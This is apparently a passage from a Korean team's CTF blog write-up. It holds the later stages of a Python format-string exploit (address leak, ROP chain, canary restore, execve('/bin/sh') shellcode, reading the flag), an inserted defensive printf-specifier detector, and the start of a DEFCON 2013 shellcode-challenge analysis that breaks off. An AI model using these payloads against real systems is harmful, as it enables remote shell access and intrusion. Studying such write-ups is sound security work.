<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">''' stage 2 '''</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># calculate &mmap, &read</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 = '.%27$s.%28$s.%29$s.%30$s.%31$s.%32$s.%33$s.%34$s.AAA'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_mmap)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_read)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_mmap+1)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_read+1)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_mmap+2)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_read+2)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_mmap+3)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_read+3)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += 'A'*(128-len(p2))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'len : ' + str(len(p2))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send( p2 )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># in case we just got 'msg?'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">if len(r) < 10:</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print r</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># get mmap, read address!</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap1 = r.split('.')[1]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read1 = r.split('.')[2]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap2 = r.split('.')[3]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read2 = r.split('.')[4]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap3 = r.split('.')[5]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read3 = r.split('.')[6]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap4 = r.split('.')[7]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read4 = r.split('.')[8]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap = unpack('B', mmap1[0])[0]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap += unpack('B', mmap2[0])[0] << 8</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap += unpack('B', mmap3[0])[0] << 16</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap += unpack('B', mmap4[0])[0] << 24</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap = ctypes.c_int32( mmap ).value + p_mmap + 4</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read = unpack('B', read1[0])[0]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read += unpack('B', read2[0])[0] << 8</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read += unpack('B', read3[0])[0] << 16</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read += unpack('B', read4[0])[0] << 24</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read = ctypes.c_int32( read ).value + p_read + 4</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'mmap : {0}'.format(hex(mmap))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'read : {0}'.format(hex(read))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">''' stage3 '''</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># set ROP payload</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># [&mmap][&pppr][0x11111000][0x13001][7][32][-1][0][DEADBEEF][&read][0][0x11111001][0x101]</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">zero = '%2$c'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 = '%272c'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('<L', mmap)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('<L', pppr)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += zero + pack('BBB', 0x10, 0x11, 0x11)</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># 0x11111000</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('BBB', 0x01, 0x30, 0x01) + zero</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># 0x00013001</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('B', 0x7) + zero + zero + zero</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># 0x00000007</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('B', 0x32) + zero + zero + zero</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># 0x00000032</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('<L', 0xFFFFFFFF)</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># -1</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += zero + zero + zero + zero</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># 0</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += '%4c'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('<L', read)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('<L', 0x11111001)</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># ret addr of read</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += zero + zero + zero + zero</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># stdin</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('<L', 0x11111001)</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># read buffer</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += pack('BB', 0x01,0x01) + zero + zero</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># 0x101</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p3 += 'A'*(128-len(p3))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'len : ' + str(len(p3))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send( p3 )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># in case we just got 'msg?'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">if len(r) < 10:</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print r</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">''' stage4 '''</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># restore stack protector</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p4 = '%2$140c' + pack('<L', ctypes.c_uint32( (canary>>8) + 0x41000000 ).value)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p4 = 'A'*(128-len(p4)) + p4</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'len : ' + str(len(p4))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send( p4 )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># in case we just got 'msg?'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">if len(r) < 10:</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print r</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-family: 'Courier New'; font-size: 9pt; line-height: 1.5;">''' stage5 '''</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># trigger exploit</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p5 = 'n'*128</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'len : ' + str(len(p5))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send( p5 )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># send shellcode</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># execve('/bin/sh')</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">sh = '\xE8\xFF\xFF\xFF\xFF\xC0\x8B\x34\x24\x83\xC6\x14\x31\xC9'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">sh += '\xB1\xFF\x8A\x06\x30\xC8\x88\x06\x46\xE2\xF7\xCE\x2C\xAF'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">sh += '\x94\xD4\xD5\x8A\x90\x9F\xD9\x97\x9D\x9D\x7B\x12\xA2\xBC'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">sh += '\x67\x0C\xDD\x2B\x5A\xE2\x25\x67'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">sh += '\x90'*(0x101 - len(sh))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send( sh )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># got shell.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send( 'cat flag\n' )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print s.recv(4096)</span></div>
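<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
The payloads above work by handing positional conversions (%27$s, %2$c, %2$140c) and large width fields to a printf that receives attacker-controlled data. As an added, defender-side example that is not part of this writeup, the Python 3 module below parses printf conversion specifiers out of untrusted input and classifies each message the way a log monitor could; the sample messages are constructed to mirror the stages above, not captured traffic.</div>

```python
import re

# One printf conversion: %[argpos$][flags][width][.precision][length]conversion
# (POSIX syntax). "%%" is a literal percent sign and is skipped below.
SPEC_RE = re.compile(
    r"%(?:(?P<pos>\d+)\$)?(?P<flags>[-+ #0']*)(?P<width>\d+|\*)?"
    r"(?:\.(?P<prec>\d*|\*))?(?P<length>hh|h|ll|l|j|z|t|L)?"
    r"(?P<conv>[diouxXeEfFgGaAcspn%])"
)

# Constructed sample messages (not captured traffic) that mirror the stages of
# the writeup: a positional %s leak, a width-padded chain with a positional %c,
# a positional %c with a large width, the plain trigger message, and ordinary
# text with an escaped percent sign.
SAMPLES = {
    "stage2_leak": b".%27$s.%28$s.%29$s.%30$s.AAA",
    "stage3_chain": b"%272c" + b"\x10\x11\x11\x10" + b"%2$c%4c",
    "stage4_canary": b"%2$140c" + b"\x41\x41\x41\x41",
    "stage5_trigger": b"n" * 128,
    "benign": b"progress: 100%% done",
}


def parse_specs(data):
    """Return one dict per conversion found in the input; '%%' is skipped.
    Bytes are decoded as latin-1 so that raw binary never raises."""
    text = data.decode("latin-1") if isinstance(data, bytes) else data
    specs = []
    for m in SPEC_RE.finditer(text):
        if m.group("conv") == "%":
            continue
        width = m.group("width")
        specs.append({
            "pos": int(m.group("pos")) if m.group("pos") else None,
            "width": int(width) if width and width != "*" else 0,
            "conv": m.group("conv"),
            "raw": m.group(0),
        })
    return specs


def classify(data, width_threshold=64):
    """Classify one untrusted message, most severe class first:
      'write'      - %n present: printf would write to memory
      'pointer'    - %s/%p or explicit argument positions: stack/pointer reads
      'padding'    - width fields >= width_threshold, typical of output tuning
      'suspicious' - three or more conversions in what should be plain text
      'clean'      - nothing printf-like
    Returns (verdict, specs)."""
    specs = parse_specs(data)
    convs = {s["conv"] for s in specs}
    if "n" in convs:
        return "write", specs
    if convs & {"s", "p"} or any(s["pos"] is not None for s in specs):
        return "pointer", specs
    if any(s["width"] >= width_threshold for s in specs):
        return "padding", specs
    if len(specs) >= 3:
        return "suspicious", specs
    return "clean", specs


def scan_messages(messages):
    """Map each message name to its verdict. The stage-5 trigger is 'clean'
    on its own, so detection has to fire on the earlier probe messages."""
    return {name: classify(msg)[0] for name, msg in messages.items()}


if __name__ == "__main__":
    for name, verdict in scan_messages(SAMPLES).items():
        print(f"{name:15s} {verdict}")
```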
Team. Alternatives, 2013-06-20: DEFCON 2013 shellcode 400 - penser<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
An x64 ELF is given. It is a fork-accept daemon.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-size: 9pt; line-height: 1.5;">The client handler receives 4 bytes, used as the size of a malloc buffer.</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<img class="txc-image" height="347" id="tx_entry_18951_" src="http://cfile30.uf.tistory.com/image/210F874751C1A2362E8A89" width="602" /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
The size limit is 0x1000 bytes.</div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<img class="txc-image" height="137" id="tx_entry_75223_" src="http://cfile27.uf.tistory.com/image/2121874751C1A236205A5F" width="753" /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
The server receives the shellcode into the malloc buffer.</div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<img class="txc-image" height="202" id="tx_entry_86355_" src="http://cfile4.uf.tistory.com/image/2220EF4751C1A23723CAD1" width="586" /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
The server allocates RWX memory of twice the malloc buffer's size, then copies the shellcode.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
In fact, the malloc buffer has RWX permission too.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
After that, the malloc and mmap buffers are passed to a function (my_something).</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<img class="txc-image" height="650" id="tx_entry_42508_" src="http://cfile22.uf.tistory.com/image/23405D4751C1A2370FCF37" width="769" /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
my_something checks whether the buffer and length are valid, then memsets the mmap buffer to zero.<img class="txc-image" height="374" id="tx_entry_12340_" src="http://cfile4.uf.tistory.com/image/027E0C4751C1A2373AED1B" width="526" /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px; text-align: center;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
There is a loop which copies the malloc buffer contents to the mmap buffer byte by byte.</div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
Any byte outside the range 0x20~0x7F is rejected, and each accepted byte is copied followed by a NULL.</div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
This means our original shellcode has to be ASCII-UNICODE proof.</div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<img class="txc-image" height="490" id="tx_entry_37938_" src="http://cfile10.uf.tistory.com/image/273C914751C1A238113920" width="769" /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px; text-align: center;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
After our shellcode has been UNICODED, the server executes it with CALL RDX.</div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<img class="txc-image" height="515" id="tx_entry_38191_" src="http://cfile2.uf.tistory.com/image/2307184751C1A238319276" width="601" /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
It seemed impossible to write a working reverse shellcode that is ASCII-unicode proof.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
So we searched for every possible assembly instruction we could use,</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
and investigated the register context and stack environment with GDB.</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New'; font-size: 9pt; line-height: 1.5;">Breakpoint 2, 0x0000000000401226 in ?? ()</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">(gdb) i r</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
